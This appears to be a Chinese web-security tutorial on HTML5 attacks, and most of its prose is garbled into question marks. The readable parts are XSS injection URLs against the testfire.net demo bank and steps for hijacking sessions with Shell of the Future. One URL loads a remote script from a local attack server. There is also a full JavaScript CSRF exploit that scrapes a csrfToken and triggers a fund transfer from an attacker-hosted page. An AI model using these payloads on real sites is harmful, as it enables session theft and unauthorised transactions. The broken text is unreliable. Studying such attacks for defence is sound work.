????HTML5????????????
???????????? ???????[ 2014/4/21 14:13:51 ] ??????????????? ??????? ???
????3??????????????http://127.0.0.1:8008/sotf.console (firefoxЧ????)
????4??????????????????????檔??Shell of the Future??????JavaScript??exp- e1.js??e2.js?????????????XSS???????????????????????
??
????5??????????????????????????
????http://www.testfire.net/bank/login.aspx (admin/admin)
????????????????????????XSS?????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E
????6???????????????????????????????£?
????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E
????7????????????????????IP??????????????????????“Hijack Session”??
????8?????Hijack Session???????????????棺
???????????CSRF?????token??
?????????????????????token??????CSRF??????????????HTML5???????????????????п????????CSRF??token?????CSRF token??????URL(GET????)?????????????CORSЭ?飬???????????????CSRF payload??????????????????????????????????????????HTTP ????“origin”??????????????????withCredentials?true??????????????????????
????1?????????www.bank.com??
????2????????????CSRF????????????????????????????token???????GET????????????????????£?
????<input type=”hidden” id=”test” name=”csrfToken” value=”12345678″ />
???????????£?
????http://www.bank.com/Confirmation.jsp?value=200&csrfToken=1234234523
????3???????????email??IM????????????????????????????ww.attackersite.com
????4????????????????Ajax????www.bank.com????????Щ????????????????CSRF??token???
????5???????????????????token???????????CSRF??????
????6?????????д?????????δ???????Ajax????ConfirmTransfer.jsp??沢????????????????????????????csrfToken??????????????Ajax????????????а?????CSRF token??
<!DOCTYPE html> <html> <head> <script> function testing() { var xmlhttp; if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("GET"??"http://bank/Myapp/ConfirmTransfer.jsp"??false); xmlhttp.send(); if(xmlhttp.status==200) { var str=xmlhttp.responseText; var n=str.search("csrfToken"); var final=str.substring(n+18??n+28); var url = "http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&Account=1234&csrfToken=" + escape(final); xmlhttp.open("GET"?? url?? true); xmlhttp.send(); } } </script> </head> <body onload="testing();"> </body> </html> |
???????????в???????????У???????????飬??????HTML5?У??????????????????CSRF TOKEN??????Щ??????
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11